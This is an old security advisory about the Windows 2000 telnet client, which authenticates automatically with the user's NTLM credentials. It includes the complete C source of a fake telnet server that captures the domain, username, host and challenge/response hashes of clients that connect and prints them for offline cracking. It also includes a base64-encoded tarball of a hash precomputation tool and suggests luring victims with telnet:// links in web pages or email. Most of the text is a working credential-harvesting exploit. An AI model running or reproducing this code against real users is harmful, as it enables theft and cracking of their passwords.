COMMAND
telnet
SYSTEMS AFFECTED
Win2000
PROBLEM
'monti' found following. Microsoft was informed of this problem
(with exploit) over a month ago. Windows 2000's telnet client
'telnet.exe' supports performing NTLM authentication using the
credentials of the logged in user. If it connects to an NTLM
enabled telnet server (i.e. a Win2k server with the MS provided
telnet service) it will automatically attempt to log in with the
users credientials without prompting them for any information.
The NTLM challenge/response protocol as others have shown, is
vulnerable to brute-force cracking. L0phtCrack, with it's "sniffed
NT hash cracking" capabilities is an excellent implementation.
This behavior is seen consistently in other Microsoft written
clients. IE, Netbios Workstation (i.e. windows itself over
netbios), and probably others have and/or do automatically
authenticate the user with NTLM (and sometimes other even worse
schemes) without prompting them.
NTLM challenge/response is *NOT* an iron authentication scheme,
MS! Stop trusting it so much!
In short, if you can get the user or his/her machine to telnet to
you with telnet.exe, you can get ahold of enough information to
perform a brute-force/dictionary crack on their password (and
find our their Domain if they are logged into one). Even if you
arent going to crack their password, you can get entirely too much
information IMO.
During tests it was discovered that IE associates the telnet://
URL with the vulnerable telnet.exe. This opens up several
possible ways to force a user into connecting to you with a
malicious HTLM web page, email message, and so on. One would
speculate that it might also be possible to force this to happen
without user intervention with javascript/activeX/java or really
creative HTLM.
Also, since NTLM relies on the server "randomly generating" an
8-byte challenge for the authentication, we can choose our own
with the code provided and use it to pre-compute a database of
encrypted passwords to avoid even having to crack them. Also
attached is a really ugly bit of code 'monty' hobbled together a
while back that can be used to do this.
Please see the exploit for technical details. Please note, this
code will only work on intel or other little-endian systems right
now...
At DefCON cDc/Newhackcity had discovered and discussed this
vulnerability during one of their presentations.
The code (ntlm_telnetd.c):
/* NTLM telnetD v0.8
Snarfs NTLM challenge/response by convincing w2k telnet client to
auto-authenticate.
Outputs auth-data in LophtCrack sniff format on stdout.
compile: gcc -o w2kteld ntlm_telnetd.c
run: ./w2kteld
Then wait for w2k to telnet to you.
for the impatient, there are always ways of making w2k telnet!
proof-of-concept version. more features to be added.
by yeza (8/2000)
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define LISTEN_PORT 23
#define LISTENADDR "0.0.0.0"
#define VERBOSE 0 // 1 for verbose
#define CHALLENGE "\xde\xad\xbe\xef\xde\xad\xbe\xef"
#define MAXBUF 2048
/* Below are hardcoded telnet negotiation values.
These are based on packet sniffs and as little decoding as possible.
I'm lazy and this isnt really a telnet server so why muck with telnet.h?
*/
static unsigned char *srv_neg1 =
"\xff\xfd\x25\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x00\xff\xfb\x00";
static unsigned int srv_neg1_sz = 18;
static unsigned char *srv_neg2 =
"\xff\xfa\x25\x01\x0f\x00\xff\xf0";
static unsigned int srv_neg2_sz = 8;
/* Below is the hardcoded NTLM challenge.
Change the 8-byte challenge above if you dont like the smell of 'deadbeef'
Change the hostname if desired -- but keep tabs on hostname len, telnet hdr
size and 'srv_fake_NTLM_challenge_sz' if you do.
*/
static unsigned char *srv_fake_NTLM_challenge =
"\xff\xfa\x25\x02\x0f\x00\x01" /* telnet auth head */
"\x38\x00\x00\x00" /* Size of challenge token */
"\x02\x00\x00\x00" /* L int = 2 ?unknown? */
"NTLMSSP\x00" /* Token header START TOKEN */
"\x02\x00\x00\x00" /* NTLM sequence = 2 */
"\x08\x00\x08\x00" /* hostname len (twice) */
"\x30\x00\x00\x00" /* hostname offset */
"\x05\x82\x02\x00" /* 4-byte flags */
CHALLENGE /* 8-byte challenge */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* unused */
"\x00\x00\x00\x00" /* unused len */
"\x38\x00\x00\x00" /* unused offset */
"D\x00O\x00I\x00T\x00" /* hostname "DOIT"(u-code) END TOKEN */
"\xff\xf0" /* telnet auth tail */
;
static unsigned int srv_fake_NTLM_challenge_sz = 73;
int printhexdump (unsigned char *buf, int len)
{
int i;
for(i=0; i < len; i++) {
fprintf (stderr, "%02x ", buf[i]);
}
fprintf (stderr, "\n");
return (i);
}
void
cphex (unsigned char *dest, unsigned char *src, unsigned int dlen)
{
int i;
for (i=0; i < dlen; i+=2)
{
snprintf ((char *)(dest+i), 3,"%02x", src[(i/2)]);
}
}
void dropconn (int sock) {
close(sock);
fprintf(stderr, "\nConnection Closed\n");
}
/* Structure to hold snarfed auth. information */
struct client_info {
unsigned char user[128];
unsigned char dom[128];
unsigned char host[128];
unsigned char ipaddr[16];
unsigned char chal[17];
unsigned char lmh[49];
unsigned char nth[49];
} cli_info;
/* NTLM TOKEN HEADERS */
/* Request token header structure */
/* 32 bytes for this header */
struct reqtoken
{
unsigned char protocol[8]; // "NTLMSSP\0"
unsigned int type; // 1
unsigned char flags[4]; // NTLM flags
unsigned short dlen,dlen2; // Domain length
unsigned int dpos; // Domain position
unsigned short hlen,hlen2; // Hostname length
unsigned int hpos; // Hostname position
// unicode domain (variable length)
// unicode hostname (variable length)
};
/* Challenge token header structure */
/* 48 bytes for this header */
struct chaltoken
{
unsigned char protocol[8]; // "NTLMSSP\0"
unsigned int type; // 2
unsigned short hlen,hlen2; // Hostname length
unsigned int hpos; // Hostname position
unsigned char flags[4]; // NTLM flags
unsigned char chal[8]; // 8-byte NTLM Challenge
unsigned short nl,nl2; // unused length
unsigned int np; // unused position
unsigned short tl,tl2; // unknown, possibly unused
unsigned int tlen; // Total length of token.
// unicode hostname (variable length)
// unused string... does appear to be used by w2k telnetd
};
/* Response token header structure */
/* 64 bytes for this header */
struct resptoken
{
unsigned char protocol[8]; // "NTLMSSP\0"
unsigned int type; // 3
unsigned short lmrlen,lmrlen2; // LM hash response length (24 always)
unsigned int lmrpos; // LM hash response position
unsigned short ntrlen,ntrlen2; // NT hash response length (24 always)
unsigned int ntrpos; // NT hash response position
unsigned short dlen,dlen2; // Domain length
unsigned int dpos; // Domain position
unsigned short ulen,ulen2; // Username length
unsigned int upos; // Username position
unsigned short hlen,hlen2; // Hostname length
unsigned int hpos; // Hostname position
unsigned short tl,tl2; // unknown, presumably unused
unsigned int tlen; // Total length of token
unsigned char flags[4]; // NTLM flags
// unicode domain (variable length)
// unicode user (variable length)
// unicode hostname (variable length)
// lm hash response (24-bytes)
// nt hash response (24-bytes)
};
/* Stupid little Unicode helper */
int
lame_ucode(unsigned char *dst, unsigned char *src, int len)
{
int i;
for(i=0;i<len;i++){
*(dst++) = src[i];
*(dst++) = '\0';
}
return (i);
}
/* Stupid little de-Unicode helper */
int
lame_deucode(unsigned char *dst, unsigned char *src, int len, int maxlen)
{
int i;
len--;
if (maxlen < (len)) len=maxlen;
for(i=0;i<len;i++){
if (src[i] != '\0')
*(dst++) = src[i];
}
*(dst++) = '\0'; /* Throw in -1- null... !@#$AT THE END!@#$ */
return(strlen(dst));
}
void
get_resptoken(unsigned char *src, unsigned int len)
{
struct resptoken *rp = (struct resptoken *) src;
lame_deucode(cli_info.user, (unsigned char *) rp+rp->upos,
rp->ulen, sizeof(cli_info.user));
lame_deucode(cli_info.host, (unsigned char *) rp+rp->hpos,
rp->hlen, sizeof(cli_info.host));
lame_deucode(cli_info.dom, (unsigned char *) rp+rp->dpos,
rp->dlen, sizeof(cli_info.dom));
cphex(cli_info.lmh, (unsigned char*) rp+rp->lmrpos, 48);
cphex(cli_info.nth, (unsigned char*) rp+rp->ntrpos, 48);
}
/* gettoken
Check 'len' bytes from 'src' as an NTLM token
fork get_resptoken depending on type.
Returns 0 if everything looks good.
*/
int
gettoken (unsigned char *src, unsigned int len)
{
struct chaltoken *srctk = (struct chaltoken *) src;
unsigned int type = *(src+8);
/* check protocol */
if ((strncmp(src, "NTLMSSP\0", 8)) || (type > 3))
return (-1);
if(type == 1)
{
fprintf(stderr, "Got NTLM request token\n");
return(0);
}
else if(type == 3)
{
if(len > (sizeof(struct resptoken)) + 48) {
fprintf(stderr, "Got NTLM response token\n");
get_resptoken(src,len);
} else {
return(-1);
}
} else {
fprintf(stderr, "Type 2 not handled\n");
return(-1);
}
return(0);
}
void
usage(unsigned char *progname) {
fprintf(stderr,
"Usage: %s [options]\n", progname);
fprintf(stderr,
" -v verbose\n"
" -l port listen on 'port'\n"
" -h help\n");
exit(1);
}
int
main(int argc, char **argv)
{
struct sockaddr_in server, client;
unsigned int lsock, o;
unsigned int port = LISTEN_PORT;
unsigned int verbose = VERBOSE;
ssize_t rlen, ctklen;
unsigned char rbuf[MAXBUF];
unsigned char ntlm_challenge[8] = CHALLENGE;
cphex(cli_info.chal, ntlm_challenge, 16);
fprintf(stderr,"[ Fake NTLM Telnet Daemon - by yeza ]\n");
while ((o = getopt(argc, argv, "vl:h")) != -1) {
switch(o) {
case 'v':
++verbose;
break;
case 'l':
if(optarg) {
port = atoi(optarg);
break;
} else {
usage(argv[0]);
}
case 'h':
usage(argv[0]);
}
}
lsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (lsock < 0) {
fprintf(stderr, "Cannot create listening socket: %m\n");
exit(1);
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(LISTENADDR);
server.sin_port = htons(port);
if (bind(lsock, (struct sockaddr *) &server, sizeof(server)) < 0) {
fprintf(stderr, "Cannot bind socket: %m\n");
close(lsock);
exit(1);
}
listen(lsock, 200);
fprintf(stderr, "Listening on port %d\n", ntohs(server.sin_port));
fprintf(stderr, "Awaiting connections\n\n");
while (1) {
int csock, cl_addrlen;
unsigned int reqlen, resplen;
if((csock = accept(lsock, 0, 0)) < 0) {
fprintf(stderr, "Cannot accept socket: %m\n");
continue;
}
cl_addrlen = sizeof(client);
if(getpeername(csock, &client, &cl_addrlen) < 0) {
fprintf(stderr, "Cannot get peer name of remote host: %m\n");
dropconn(csock);
continue;
}
fprintf(stderr, "Connection from: %s\n",
(char *) inet_ntoa(client.sin_addr.s_addr));
strncpy(cli_info.ipaddr,(char *)inet_ntoa(client.sin_addr.s_addr), 15);
/* ============ This begins our telnet auth handshake ===============*/
/* server sends: (srv_neg1)
DO AUTHENTICATION, WILL ECHO, DO SUPPRESS GO AHEAD, DO NAWS,
DO BINARY, WILL BINARY
*/
send(csock, (char *) srv_neg1, srv_neg1_sz, 0);
/* client sends back:
WILL AUTHENTICATION
*/
rlen = recv(csock, (char *) rbuf, MAXBUF, 0);
if(verbose>0){
fprintf(stderr, "\n%d byte response to neg1 =\n", rlen );
printhexdump(rbuf, rlen);
}
if(strncmp(rbuf, "\xff\xfb\x25", 3) != 0) { //just check first 3 bytes
fprintf(stderr, "Wrong telnet neg1 response from client\n");
dropconn(csock);
continue;
}
memset(rbuf, '\0', MAXBUF);rlen=0;
/* server sends: (srv_neg2)
SB AUTHENTICATION SEND ... SE
*/
send(csock, (char *) srv_neg2, srv_neg2_sz, 0);
rlen = recv(csock, (char *) rbuf, MAXBUF, 0);
if(verbose>0) {
fprintf(stderr, "\n%d byte response to neg2 =\n", rlen );
printhexdump(rbuf, rlen);
}
if(strncmp(rbuf, "\xff\xfd", 2) != 0) {
fprintf(stderr, "Wrong telnet neg2 response from client\n");
dropconn(csock);
continue;
}
memset(rbuf, '\0', MAXBUF); rlen=0;
/* Receive what should be the NTLM Request Token */
rlen = recv(csock, (char *) rbuf, MAXBUF, 0);
if(verbose>0) {
fprintf(stderr, "\nReceived %d byte request token =\n", rlen );
printhexdump(rbuf, rlen);
}
if(gettoken( rbuf+15, *(rbuf+7)) != 0) {
fprintf(stderr, "Doesnt look like a NTLM request token.\n");
dropconn(csock);
continue;
}
memset(rbuf, '\0', MAXBUF);rlen=0;
/* Send NTLM Challenge Token */
fprintf (stderr, "Sending NTLM challenge token\n");
if(verbose>0) {
printhexdump(srv_fake_NTLM_challenge, srv_fake_NTLM_challenge_sz);
}
send(csock, (char *) srv_fake_NTLM_challenge,
srv_fake_NTLM_challenge_sz,
0);
/* Receive what should be the NTLM Response Token */
rlen = recv(csock, (char *) rbuf, MAXBUF, 0);
if(verbose>0) {
fprintf(stderr, "\n%d byte response to challenge=\n", rlen );
printhexdump(rbuf, rlen);
fprintf(stderr, "\n");
}
if(gettoken(rbuf+15, *(rbuf+7)) != 0) {
fprintf(stderr, "Doesnt look like a NTLM request token.\n");
dropconn(csock);
continue;
}
memset(rbuf, '\0', MAXBUF);rlen=0;
/* Were done with this victim */
dropconn(csock);
fprintf(stdout, "%s\\%s@%s/%s:3:%s:%s:%s\n",
cli_info.dom,
cli_info.user,
cli_info.ipaddr,
cli_info.host,
cli_info.chal,
cli_info.lmh,
cli_info.nth);
fflush(stdout);
}
close(lsock);
return(0);
}
Mimed UNIX code:
---
Content-Type: application/octet-stream; name="prehash.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="prehash.tgz"
Content-MD5: mtFc2TXCMA7BzQMCYFEdBA==
H4sICP/evzkCA3ByZWhhc2gudGFyAOxce1Mbx7L33/oUE6dOIoEQ+9KDCPsUxuBwCrCLRxJf
LpdaSSNYs9pV7a4sKw7f/XT3zOzOvgQ+cU5V6lqVGGmnu6efv+kZRswjfufGd9vP/sKXYThG
v2vAT3oVf4r3fdOxe6Zhmf1nhmlaRu8Z6z77L7wWceJGjD2LwjBZR/fY+N/0NZfxH60SHkYT
HnXuvn78TcPoObXx7/a6Mv6WhTkA9Lbds58x41v8//LX9gZrMMYuA+8TOz95tX3Kk5EXxsyb
zX0+40HiJl4YdJDmFx7F8J6ZnR36DOTsFaQNu3ODie8Ft/hwP5yvIu/2LmHN/RbbCyYRX7KL
yJvcct9n5s6OtQX/dJEU/7+482I2j8LbyJ0xeDuNOGdxOE2WbsSHbBUu2NgNWMQnXpxE3mgB
03kJgwm3w4jNwok3XaEceLYIIHtZcsdZwqNZzMIpfXhzesne8IBHrs/eLUa+N2bH3pgHMWcu
TI1P4js+YSOSgxyHqMO51IEdhiCYnDBk3IPxiH2UjrDUHFJgm4URCmm6CWoesXCOfC1Qd8V8
N8lYO3X2Z2ZOmBeQ8LtwDibdgUwwcumBF0ecLWI+XfhtFAHE7Neji5/fXl6wvdP37Ne9s7O9
04v3QyBO7kIY5R+5EIVB9UAyGBa5QbIC/VHCycHZ/s/Asvfq6Pjo4j1YwQ6PLk4Pzs/Z4dsz
tsfe7Z1dHO1fHu+dsXeXZ+/enh90IPwc1eIoYI2PpxQm8OOEJ67nx6nl7yG0MajnTyB/PnII
8Zh7H0E5l40hhx4PHwpx/TC4JTuBOPPkkHlTFoRJmy0jDzImCcuBRfYstm12FIw7bdbrd9mJ
G8ds7yOEc9+djSh12+xkj8HaZO+02eX5Xqexsd1obG+kEZx6Ps9KJmYzdxxBEZHx7vjOC2AU
0nPO4Z8gQbsjSmLyhAdPZm7gzRc+6ULCv8d0nrL9vbODw8vjm73jozenJwenFzgtW3J2H4RL
kRVomT3oUZ1QJXI282LX924DVIamAYgnuudUms9p2hTxGcz3vTfF6W5uPBB1c9P4Hj6h1qX5
mdH4Hqzwpg3kqdGxntvMuBXNL3vHzdFi2p6HcYs1m81FEIPqkAjjOwDmjRYOtlpXMHzdSrne
FbgUUysnLqM/15+3P7o+MOVnfsGa+LjVIMPWGHWenzqnyR/ppyZ+3DRbu7uDTIujPGtO0h/n
eVYLWM2eZgGO/7bOhBdkwA/Gp8PDtj4AWoihly81Xc6PKuSVJyFxh4etdn5o08LBly9Bw1bO
M+d6VCCzgeC8OiRHFdS21TqqCeB5KYBSI8oP4bQ2JIKYU8SyYG2B/aiGHZQosedMWzP9mtnP
nzB9YXbuA8xBvRO2idrGOoalVmCLGwG2JHycLCIY8L17nqIBQUMGCQIsFSTwKAqjGOteYBgs
GadHp29+EmAWg0Bc3nA5SiErFCuIz4NbAFsAZ7KUwIWUJkThoBmgdwRYnjCEsZqa2ZBhwupu
6mXONhm5olVbMxsyRE9hLebjRvOLZi2xPnHWikzNl2k+Sdfl6FEFY5og67MzZ8CLfGauTcyj
Ck5tTgnfmJZiCcKlG9sa+AnNBkiN2RY+xgYrok6FWplgNmJzd3zPYXlszsI48VctpqfI2cEv
zU+0AsAPgh0CT/YHoycIXuKpFqWUR3ITZCIHfSYuRKhWttyc5VOR6GoA6iyfejRZDTqd1cFT
+ogmyjv/rA6U0kdHGdNfvf+DyPmd8V+0/1+7/+s6Bu75xf6vZ1hdoLds2/m2//tvvLCOYU/D
Ee2X4g2bLGZzKFqs6hWtNvCMyngahTPqHXFotAonK4ZL1I8xgP6EdzodxuMYVgvP9f0VQcNo
4d8jg+zmsT/vwCrjBvexkD9CIVsr/rsr2l4vGPuLCWe7uA8Kbjt3L7VnbjR3t6F0kvzjiRfB
pPlnVezAiMwgIf98nKzmHB+lpbkgjM91oo0G/wQ7uIDa9dcHry7fHB/8cnA81HR+rh2iPG80
UCr2x6LbJ/wdpg9T2WJ0IYcxHFtbrw7eHJ1ubbHzi8vDQ8Chd+8OXrPDs7cn7Hzv5NUe+Bv2
3gen+2fv31109pnYjPypffzchW0TB/tiWtJjnizmT9/O92kXiZtxj3bS7F+QSLMV2/Nhc40z
wY6/823L/23L/3ff8ovW7zyJgv35SjaCEx4nbfE2jsZthIegNWx8DD2ooyRazOc8kqSxen5w
887sFXe6c9Nplx71NBbLKbFYZpsVno0HpUdzy1FiZpMppGlRDqRMickDDyljcocd2jkHuvi3
7bewSZAoEsdLAEDGg3G0okpArqOEJe499IVuStGG9wM6gmDPiZTd89Vzwp75AgRbDg3GMl2l
PNAtnQJUCxkYhuhHloECkqy5kGYjLUy10ByTOaTxGSSLz+D5K7N73QZ55pVlXoPBjM34DGCw
iS7+8X+NH9uWCY7IHkOw6LHp0GOVE2p3gOPpe6EHUQJpmhQaLckQWYGcqIh6BFGnMKP6IpAP
ov0+U+02FtyvXjAJlzE7vWAnrx32M/R0bLoIaCcXd9BJMS4BYwrpzWx1sxzHsJlTOyLQSThE
vJAIRtkLZgzTh8s7z+dNJN3cZN/BUCsdUi/g2dzMOCJYRmDFhKdK6QbbgDUlAEwERGdikRah
BMgH3S9Pj/bfvj6QIx0kPw0TCYYRv3Uj3AMT0kPhj+Et2I5rKlISHsygoUO49Gil5j5r+l6S
+HwLNy5u0EJCcNjMTVA61HTBL7NRnITgHOWZSZykaYP1rXxTdJc31D8CJ/TtFG7xgimbHvkT
mqldcgnzNjdb7HPJicAIhDjZsDQmNhWok0EbhjIFjOkhUC+QVvXYmzZpuspoqtco4u59xvtQ
jK9H0ZXBBdqEC2RIE1ECO6xg0F9oFaxFXAZDQt1s4uCupKaQERXLyVr0/3K+nFyZ1s61FgWo
mndqemgyYL3AVMEVhfoIyEHTGhD+uWNqhkAnLbchLJCYWDb50tbCAA5FwpcoqLI+QAYMDStV
Urk7FhUCcAeFAT5aBB422Lo2uVRFU9tMeQmTU6tadAM8uhbJB9MdBPECVmdVfDELFtBhYAfl
BS5Oqk0D5PuuP8aT6fTwB+ImsLnkHA1XcFrY37PY+52HU3n6oEVCrkMQyjYrHfkKe4QdEuxe
hzKpJMBheuDnALqMWFtvOlkawYJwevHlS4J4yYVBWw+k3lWrQjqaZa6aSAG5Gq+Hc7JwFFJf
Q2biYnh8wsLllPDOpfr5USsgOr9jTQBIGMJYEgAG4bJNHeIRm1HnvnQDaiSpHe2IzVYrc1OQ
3PizG5jl5hbiJp2Bqou3MExBqiw94SQy9cq0jevMUrUepn7Af2QyyKLZyrkul2kKPSjKTfDF
OJzNAaZHPm+le0nNDYXoKJ0pQowSrxwhlRJqeWbpA8FeUO7EDW59nps5FivXsRvMADnEoqJr
oxzjYO2hLpkaaQ+QAki9I7Czavo0SUt4JF3Yq3xRStVaT2C3kRrNSm4o+2DscxjB/YUfjmHZ
UF17MTGbHwSQYU7izjKAPGt1dNeMfudRmCZHPi/SkviKr4aP23rwejAGlbE6XH/prorYB53S
CXSqjAAyUeciURjOvmt8TXW2n76ToGqT45BGSIMxhN1O8zv80JKrcPP08vi4lQ6BANVbkNys
lZPkxItPcDmn1o41g60t9sMPrLkxgQ5PtCDQorQYktHsJCIv4KFRs9UhxaVg/MikOgo9UE0v
9sMl8GzgYarKjY0YZkpCIY32TLJmVAPzQFo/yMOSg9PXX3ZU8gVnLK8Pzv/k+QptWbEI8FCs
QI2lAzNgTMXyh4081JI6BlCHM+4CFzpoUgUXNL5JOA79xpMOaPrfzl2+nbv83c9dsPxO314c
nP/EGmksqSWe0cFCAPvHJOGzeYIKQNCmbpx8BxPBmzHoBuH08PgBT5yRH2GnWIwFwfATZiQX
IR2YhqVaKHc82tCOQ8LAT1MbFhRvtpixgOMu1Y1WFJ9yObexNuh0fbQCJ/tIgjLAv5PFGH9Z
Jo6XcS2lE/M0ZiceXjIBH6vN/06XKKCo/UmLzAEHEPRgNxGRG7DEUU02CbGjDACtPQk9EKoJ
GYnrcIdc0aA2woVGQ3gQN0zzMI6xEUNPI1glqcvQwKwT355w/RAIFIb4u7h/jhPuTqRE0kWU
GDrCZc+xw3kOnrgNIaHuZh0ZF7kWQ6TBd+CFeUi77oASTmlAtQtOxJOQAPsxnwyCso4kPpNX
IEOgOD9K3YWB8i6NkjQJuTAXws8l4B1d7J01aAW9lVd1YoIE4krzxee3MG04h/hThkwJWhHf
YFs35hF4m+ppFC7E5R13DlAxdkee7xFO0Dy5SQo2AsSASMpjUdUgeOpFM3QpxgABMeY+rK+4
hZi5K9zj8gQMFdeGPKESWoZCFnNR1i5A4nTKI3FpKF4ixItqDqF3An0/8lajcGICjp2ZV90e
drifu/02c6BsHdje2HabWV1oOeEZ22nXni0woO3CVqhrAJ8FfA7wQcNqDup5TKBlQNuFubrA
78BcNsxl9dfwAK0JtAxoe8DfBX4H5rJ79Tw9oO2CXAdsQDiygd+CZ2Z3jT1A20PdQLYDdthg
mw3zWdYa3YCWAW0PfQHyHZjTBjnWGr/hFtIEWoZ2wxwWzGHCvMx5GJYiZF05A4oQzoQRQU9Y
OKtJEuqtsYV0sJg0pFmNNVqhd3aUJiKSbF0kcbxPkRMW2BTZWnrMLIwcRgI9hJHprtEfPe8Y
Mku6IiudNfpgRmAGY7S7PZGNEJF6+p7IWsxeu0cRY7ZVEQH7queIGqnOdZXT9bmYz9lCzNfw
Veeiyrl6Pkd4ALxFHrQtkTHmIxFdgwGYbfV85VrWa7Zez3LN6LXxn9Q2ZGRFBB1VQ5hWliwd
SwAKpvraMmKKhKoIMx58uB4XmSKh1EA3YKhNey2LJKHooiUYLbO/nqUnIWEgHI5JZZlrWSQJ
5RH6DPPCWm++JKF0p2IfrIc3ZBnIejJkvZPTKyLTvbItFRkdUx43BGeRaEUo13+MGoOOfiWr
e49Sd4Vb7UdQU6kisoKqzHmMmuqxL9Nv5zFqqiRb+JI9qjfhgykRvIseL7q8J+DsM0EDKo0w
gY5HyEADED7sNXCGJcckgKNDu9KpWJb2mqAhhGEJIZxhkiO0oboIc/YaFyM0YDgQJtARCBmY
wggf6/IQoRbdgLCLaYIQjImFcGytgUGEMAwNwhm6EqENg4Awt65NwSUBEwGXB6x7XCowhXDZ
WJdwCLWYnAi7iBkIwVjVCMcihFoE4/GVKTo21KqN8xX+q35YFDMKP10Nrq+cayUuVe8zdRro
ONPOoJIQyZTYZ8s1ryfXsK5cIwzCX83Sz4ZCZSlRukhJ1qWY0nwm3c8GOUmy4yEJAymhJ6XJ
yiZdZHKmOqI0IycpJR3IVcBJlzjB2s3aTQJjQ5qGitoPIEv3VVcyDtJ1OWVOBfczq2liqZeZ
18uWVjmCgyRbmeSUU/MbU6tst+R1JUVR6/HsSqlWJoXZKs55X9mSVE7M1DLrZK5Xy2LONDK9
6CvlyJ3MV6lA6cfUR/0Mx4QXynr1M3Gpu3tpOybi282cp9IEiqEkqqdFS/XMthBPWqgqsFTk
lIfzouSInSWMkphWgHKOrSKnJBec1c+6AVaQlwZDN9LMOve6GJpZG0MGGprf+pqBpmbgTl6U
bpWh1a3StquliZNZR1o6pWzvaoVlZPFXzZPqu1LblJJOwVdWZrsqYtV4sV7mI5VrKj5VBjqS
TRfZL5SOBDXTSJdwMUWvBFjKm3pi9LUU29EAtKelXN5VCndTH5gFJNUDupPVu7C5WIR6hBVw
W5qjlJ62BtkpKpayQQeDFAR2NJNMLY8NDRvz9byT9b16zpiqSVel7uQzRUS45HZbC6DURQXM
VL5TYN+TkgcV4K4ng6P5eJC5KLfmdDVkrgAZIysWfc1Ja00eCZBIueRW5JUERVMHS+kitVqp
Lb+KZ7pAWzlJvUwKUZqag/taGA0NtixldjGtbL3Ss5xU6GlqQJ0ig9oDl1G0m6mVlplCUK1g
SHpaySUD9TXEzMotNUTDnhS9bLU+5iRZWtX1NTcNMs40EwxNCun48KB1X/QLN+zDFwlvajf4
8hf3NubqAl/9VSU8Lmx6L4yhtxsM8T5SqcMEwVcedndecDWHd1t4HeIhr4of33nTRP0WU8w6
DhdBUqEAEaFQ2EEMv4Jak6umt0mTtf4RXH+JiIkQICSVbMLDWjep8q6ZvbXkdTBT/rR0S+Xv
Pn1za6s8OYoUv2QFgfrNLMVlPcZlIVdB6U9h9DSNv1pOmPjm/+CNVeXESUhXLSpTVLy756uS
Km32oc20C2filsk9nTMXno6vrEHx2aTi2XhSwXzv4cYFz3WKc03MfHrSUx/PGdoswh+FocgX
9NnVD1mcoHUbr7a2xUk5bpBb+VuBytXWoNrXY+FpNN+rTu86zonGuUkuqeI2e8Oae4iqqtu4
YfSuccNbcd9QUk3yVGUzZDnhvaI2m8gTICBlJVLlOwgPykMWOsTGUwad/qHC3ROqRMGAxwlO
ydsfwOoPu7Y1/FBj9dUH8hqkwIfrsrmRNryZS4SHL3QvJQ6P8ulXGLxfMzrCvXevbnQ8yqdp
Pr/XjkaWGKwNDI+gCoSPHRGUMi0iEejfZkgsI1lNqUVlQEGpPeQgynugvN/tDe/XUabXjCBa
V/cYMPTlh40e22T3109RoiJgOkbN2iwY1lLMXjRpZuN6d9fE7yPSp27VxOoVSBYTWGz6CiN9
tOCjlX20cwKddQI1ZznkLPYF3mrS2Q58ml1fBdfsB9Y0d3eb9tZ9q9X6p/mTUVG1D18pss7T
IgsZ/GHD2SRtpd7D2oSFfAccGYmUxV8UWHUpGwHK+G1GDNVUZRCp1VVCSURA8mcESdCBwvxQ
DTgSXSOfCtMXh+V5/ZUvaBVGQjrHlRD50Miv23ES3SThDSxcxbu5MFL8kkrVEq5NDMNQCOLq
NLx5+dIc5sZMSrimGP3B+GTgH00Q3+LFZyZwWK08i5WxmMRiA0s3ZbGAxS6w2BmLRSx9YHFS
FhtYnAKLk7HYxIJfSLZTFgdYugWWbsbiIIuJLFbK0gWWXoGll7F0kcVGFjNl6QFLv8DSV97s
IUP/sLIrGNStOyiBGoOmeIez6UlVyoXZSNzFf9pXhp6UHMXNwKii3fKCqqcgr/A4PyGMW1e5
XkfLZWrEkKKmB+s5dU5DZYTTYBvkbQ9STOxvNb1/DAAWW+yfzGQ/6V+Y0Tw+ylxufTE/Oci7
zn8bR6t+2WUjGXY/I7JxVGNjbV6kTb3xWE+zxk1T1pTa1qMZTYQu+ONFwQeFNPzir8rp9/dz
o/F8cCV+e2t8csA/8G8f/8VfAxmf8BdB8MSg9+KJQ//iL07SNJJlQNepQV6bqa9tlcY3BxnF
Zl+7I/tnv8On2ZdOh6qK7xKYVdpYDmojCTb7NSR0wV/SmGpBoC8X4A03vAuFu9swvM/+yMg4
4hPxVW+6k47f7os4uw3pewihvDgprrQG4VLMKi5L8dWPeJdLfGl6gjc2l+6q9LUElH+Dks0q
5CkDz3rcyY+OFtMCRkhf4B9eoP0DspddRZhHNDC+uSP9lFfX+uvUzRCN0PlR4FtvFDHQwizW
lEfMtVrDL7lynd2cfup165PXjuDAtKNrgS4TX90TF1TxL9Mki+kUb9pRao0XEd5V83O58ye+
B+9WXM/GL6HUXc9edzX7283sbzez/1/dzP7pqXeyG/Ib4SB/MePy3q0rGkNYQ/CrnEAHmxc2
8pKYvptJE5X+cAZyiL+HlB2My78Ntddmr0DxNntdGjpUfz/qt7Z69D599z86Bssvt/67vWv9
bdsG4vusv4IL1vgRubEkP2PXgBMHbYE5w7YWcNulg2wpjlb5EctebGDb3767IyVTL7tLh+7D
eGgrla8fSVHk8Y76uTg6fcdJiP4alU7fl2Qbp8j28slljqBAvL7Dglm65Ff/tOTRx3cf32dU
kVvpzLC4LbcCB3IJW3YKuh+xvaGkvuIuFrfdblA63Sehqm97vaJlVgLx2VZEbvTD25uBUbT1
sT7RHf2THsAMAGtNWBGbncGzoEgk0RrB/l3H+sTym4fzv4znRy4uQZAFml2/ZTbb7baeLNM6
XOarA2U2rgft68u+gWVGtGx0ehvG8cyp4ThvcOICWJM3yHGz/+5eYl9o1CISs2Fyc/SbtLER
gxlHMw5nHM+DVPQIbdjZRk6jkW1WGHFzwjBul+j3IazfASy4XnYAD65XHcCE60BKKB5tX7/U
r/RB6KyC8RvGDHQeJxykGJPMjBkxkTgAImXmhfaFl68tKSwp3Foubv04biMXt3kMt5WL2z6K
y/3HWbjkRj2Ey720Wbj8TMBh3Foubl3gxvOauQ/YlBpMXtg0sCl1NB3EkDLvgenoQbLBMq6R
i1s/jtvOxbWO4Zq5uI2juNxJnYlbO4Zr5eI2j+Maubh1gRvPa+U+YEsCjp5eMvO+o+Mjy0o8
4HqywVZuR0u4+17Mx23k4taO4Rq57W0fx63n4lrHcK3c9hrHcZu5uHWBu5/L2RnM5TiZ480l
zuZ4c4XTOd4MBrHE8YUfMuVoAlfJlINkyicsQ9UM1/tyJ6+RGXbGQwbntPctBT2UjHnl2hm6
VUxuDBYh6HchKslcK1aYEh02LTkrOn2qpcxG1TJtA0Ilk5uEJjLamm9J3erEIrjBfBsRYsZj
zTAWqp8RbYXR0F4RzXf1/HtD2A+SJjPDbxansGHxpvjxOBH/4ed7uCMRNCASC8iTmaUOmjyM
mBtfdNOQqzuJ0DE0as7KrNXJHRWo3YAK16zVTasquSAuKdy9mzj2uNWWxzqGt1tj25ncufvw
